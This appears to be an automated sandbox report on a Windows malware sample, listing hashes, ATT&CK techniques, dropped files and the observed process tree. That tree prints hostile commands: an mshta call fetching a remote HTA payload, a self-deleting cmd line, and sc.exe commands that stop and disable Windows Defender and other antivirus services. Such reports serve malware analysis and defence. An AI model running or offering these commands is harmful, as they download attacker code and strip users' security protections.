be07e191128ff79bf44c0f95917aebe3ff9c54cd2c59b9edeb41f7d87ee7107e

Analysis

max time kernel
2s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2023 12:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6d48c81bf597946b07b4bf4c79630962.exe
Size

2.1MB
MD5

6d48c81bf597946b07b4bf4c79630962
SHA1

ab483949eec58c7828ebd2a95138552b8528d518
SHA256

be07e191128ff79bf44c0f95917aebe3ff9c54cd2c59b9edeb41f7d87ee7107e
SHA512

5a07cbcec92cd0eb3f49ff0c830cada9c7a7631feef2c681a30338e00717e0932fbbee5ac7cbc5d55d4631676157244b31cf15e541c1c95f74e39d60d0914894
SSDEEP

49152:loCzN6HV8ZisMKT2hgRlQy6aSOo+Z4X2NHDy7WqXOpGAUh:rzwOohGNjy7FXkGAW

Score

10^/10

evasion upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://galaint.staticstatinfo.in/?0=179&1=0&2=1&3=108&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=1111&12=ahetrofxjr&14=1

Signatures

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 1 IoCs

pid	Process
4344	Protector-ljik.exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3208-4-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/3208-5-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/3208-3-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/3208-11-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/4344-18-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/4344-17-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/4344-19-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/4344-21-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/4344-28-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/4344-30-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/4344-43-0x0000000000400000-0x0000000000975000-memory.dmp	upx
behavioral2/memory/4344-71-0x0000000000400000-0x0000000000749000-memory.dmp	upx
behavioral2/memory/4344-94-0x0000000000400000-0x0000000000749000-memory.dmp	upx

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2260	sc.exe
5072	sc.exe
1720	sc.exe
860	sc.exe
1072	sc.exe
1092	sc.exe
1992	sc.exe
1544	sc.exe
4076	sc.exe
2932	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3208	6d48c81bf597946b07b4bf4c79630962.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3208	6d48c81bf597946b07b4bf4c79630962.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 3208 wrote to memory of 4344	3208	6d48c81bf597946b07b4bf4c79630962.exe	91
PID 3208 wrote to memory of 4344	3208	6d48c81bf597946b07b4bf4c79630962.exe	91
PID 3208 wrote to memory of 4344	3208	6d48c81bf597946b07b4bf4c79630962.exe	91

C:\Users\Admin\AppData\Local\Temp\6d48c81bf597946b07b4bf4c79630962.exe
"C:\Users\Admin\AppData\Local\Temp\6d48c81bf597946b07b4bf4c79630962.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3208
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\6D48C8~1.EXE" >> NUL
  2⤵
  PID:4572
- C:\Users\Admin\AppData\Roaming\Protector-ljik.exe
  C:\Users\Admin\AppData\Roaming\Protector-ljik.exe
  2⤵
  - Executes dropped EXE
  PID:4344
- - C:\Windows\SysWOW64\mshta.exe
    mshta.exe "http://galaint.staticstatinfo.in/?0=179&1=0&2=1&3=108&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=1111&12=ahetrofxjr&14=1"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\sc.exe
    sc stop WinDefend
    3⤵
    - Launches sc.exe
    PID:1992
- - C:\Windows\SysWOW64\sc.exe
    sc config GuardX start= disabled
    3⤵
    - Launches sc.exe
    PID:1544
- - C:\Windows\SysWOW64\sc.exe
    sc stop GuardX
    3⤵
    - Launches sc.exe
    PID:2260
- - C:\Windows\SysWOW64\sc.exe
    sc config AntiVirSchedulerService start= disabled
    3⤵
    - Launches sc.exe
    PID:5072
- - C:\Windows\SysWOW64\sc.exe
    sc config AntiVirService start= disabled
    3⤵
    - Launches sc.exe
    PID:1720
- - C:\Windows\SysWOW64\sc.exe
    sc stop AntiVirService
    3⤵
    - Launches sc.exe
    PID:4076
- - C:\Windows\SysWOW64\sc.exe
    sc config ekrn start= disabled
    3⤵
    - Launches sc.exe
    PID:860
- - C:\Windows\SysWOW64\sc.exe
    sc config msmpsvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1072
- - C:\Windows\SysWOW64\sc.exe
    sc stop msmpsvc
    3⤵
    - Launches sc.exe
    PID:2932
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:1092
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" res://ieframe.dll/navcancl.htm#http://showrealip.info/
    3⤵
    PID:1500
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:17410 /prefetch:2
      4⤵
      PID:3000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver1018.tmp

Filesize
15KB

MD5
1a545d0052b581fbb2ab4c52133846bc

SHA1
62f3266a9b9925cd6d98658b92adec673cbe3dd3

SHA256
557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

SHA512
bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\BJCNBC62\suggestions[1].en-US

Filesize
15KB

MD5
6b8b8c80f8de9e0223bbc5c57d41c0f2

SHA1
54fcf9ae76be5f627346289054a33c165a0ffb4a

SHA256
8fb37fce38ec2b6875b467f4ed54840c64fe13fc50d58dec36cfaf0d64931316

SHA512
b5d0e2b24fc8a52cabef7e14a4a9a4e99c3c78ccbcff44e29e6da8e832c7023bb15fdbec2bee8c6f387c91140eb163c6a2aa9ae43b6d1a7335829f760aba1d7e

Download Submit
C:\Users\Admin\AppData\Roaming\Protector-ljik.exe

Filesize
27KB

MD5
763089281d19006bee8c242e7b96201d

SHA1
f70666daae414f1a07f70be48f85be542b0dc981

SHA256
f22c9781ab36ec336c64a536b902ff62de928cee6914907eb19ae7c02e753251

SHA512
bbfeb0a1c3946ea600aeeda56ef9fcca3cfa1aa07c5d2743b8c6bedfb5d6a1df765477c0d9dcd6018476347558765cf7ae6d75e50ff723592be57eea3c43fefa

Download Submit
C:\Users\Admin\AppData\Roaming\Protector-ljik.exe

Filesize
57KB

MD5
8b0774ae0efe8f47fecdb735a3ada611

SHA1
67bf4681bea9b25c9a2b646d58faf62e853aca7b

SHA256
b37d2364fb56be586ebf37b0848f9aebdf250af0b54c864ebc7d12b7860dbf47

SHA512
60b3fa873631192571ff44491ebdc3e8623c2657a4d8dfd73cf7453144b45e32e659e92c3eed264dd0a6baa2342eed44a5ea3ddfb63fa4db43aabdeb926bb55e

Download Submit
memory/3208-0-0x0000000000400000-0x0000000000975000-memory.dmp

Filesize
5.5MB

Download
memory/3208-2-0x0000000075070000-0x0000000075103000-memory.dmp

Filesize
588KB

Download
memory/3208-1-0x0000000075400000-0x00000000754F0000-memory.dmp

Filesize
960KB

Download
memory/3208-4-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/3208-5-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/3208-3-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/3208-11-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/3208-12-0x0000000075400000-0x00000000754F0000-memory.dmp

Filesize
960KB

Download
memory/3208-13-0x0000000075070000-0x0000000075103000-memory.dmp

Filesize
588KB

Download
memory/4344-55-0x0000000008260000-0x00000000083EF000-memory.dmp

Filesize
1.6MB

Download
memory/4344-69-0x000000000AF20000-0x000000000AF39000-memory.dmp

Filesize
100KB

Download
memory/4344-18-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/4344-17-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/4344-14-0x0000000075400000-0x00000000754F0000-memory.dmp

Filesize
960KB

Download
memory/4344-19-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/4344-21-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/4344-28-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/4344-30-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/4344-40-0x0000000075400000-0x00000000754F0000-memory.dmp

Filesize
960KB

Download
memory/4344-43-0x0000000000400000-0x0000000000975000-memory.dmp

Filesize
5.5MB

Download
memory/4344-53-0x0000000008020000-0x0000000008185000-memory.dmp

Filesize
1.4MB

Download
memory/4344-56-0x00000000083F0000-0x0000000008478000-memory.dmp

Filesize
544KB

Download
memory/4344-10-0x0000000000400000-0x0000000000975000-memory.dmp

Filesize
5.5MB

Download
memory/4344-57-0x0000000008650000-0x00000000098A4000-memory.dmp

Filesize
18.3MB

Download
memory/4344-63-0x000000000A980000-0x000000000A99B000-memory.dmp

Filesize
108KB

Download
memory/4344-68-0x000000000AF00000-0x000000000AF11000-memory.dmp

Filesize
68KB

Download
memory/4344-71-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/4344-70-0x000000000AF40000-0x000000000AF4F000-memory.dmp

Filesize
60KB

Download
memory/4344-16-0x0000000075070000-0x0000000075103000-memory.dmp

Filesize
588KB

Download
memory/4344-67-0x000000000AB50000-0x000000000AEF1000-memory.dmp

Filesize
3.6MB

Download
memory/4344-66-0x000000000AB10000-0x000000000AB4D000-memory.dmp

Filesize
244KB

Download
memory/4344-65-0x000000000AA30000-0x000000000AA95000-memory.dmp

Filesize
404KB

Download
memory/4344-64-0x000000000A9A0000-0x000000000AA23000-memory.dmp

Filesize
524KB

Download
memory/4344-62-0x000000000A8D0000-0x000000000A963000-memory.dmp

Filesize
588KB

Download
memory/4344-61-0x000000000A5B0000-0x000000000A5D5000-memory.dmp

Filesize
148KB

Download
memory/4344-60-0x000000000A330000-0x000000000A5A4000-memory.dmp

Filesize
2.5MB

Download
memory/4344-59-0x000000000A2F0000-0x000000000A324000-memory.dmp

Filesize
208KB

Download
memory/4344-58-0x0000000009B00000-0x0000000009B0A000-memory.dmp

Filesize
40KB

Download
memory/4344-54-0x0000000008190000-0x0000000008253000-memory.dmp

Filesize
780KB

Download
memory/4344-52-0x0000000007E40000-0x0000000008020000-memory.dmp

Filesize
1.9MB

Download
memory/4344-51-0x0000000007E00000-0x0000000007E32000-memory.dmp

Filesize
200KB

Download
memory/4344-50-0x00000000072C0000-0x0000000007308000-memory.dmp

Filesize
288KB

Download
memory/4344-49-0x0000000006010000-0x000000000601F000-memory.dmp

Filesize
60KB

Download
memory/4344-48-0x0000000005FE0000-0x0000000006000000-memory.dmp

Filesize
128KB

Download
memory/4344-47-0x00000000059A0000-0x0000000005A62000-memory.dmp

Filesize
776KB

Download
memory/4344-94-0x0000000000400000-0x0000000000749000-memory.dmp

Filesize
3.3MB

Download
memory/4344-107-0x0000000008650000-0x00000000098A4000-memory.dmp

Filesize
18.3MB

Download
memory/4344-121-0x000000000A600000-0x000000000A60F000-memory.dmp

Filesize
60KB

Download